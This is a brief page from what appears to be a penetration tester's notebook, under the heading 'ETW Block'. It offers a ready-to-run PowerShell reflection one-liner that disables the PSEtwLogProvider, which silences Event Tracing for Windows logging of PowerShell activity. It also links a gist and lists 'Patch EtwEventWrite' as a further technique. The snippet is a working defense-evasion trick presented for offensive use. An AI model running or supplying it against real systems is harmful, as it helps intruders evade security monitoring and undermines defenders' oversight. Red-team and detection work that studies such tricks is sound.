Pentester's Promiscuous Notebook

Twitter GitHub Blog Sponsor

ETW Block

Event Tracing for Windows

Disable PSEtwLogProvider

https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32

[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

Patch EtwEventWrite

Last updated 3 months ago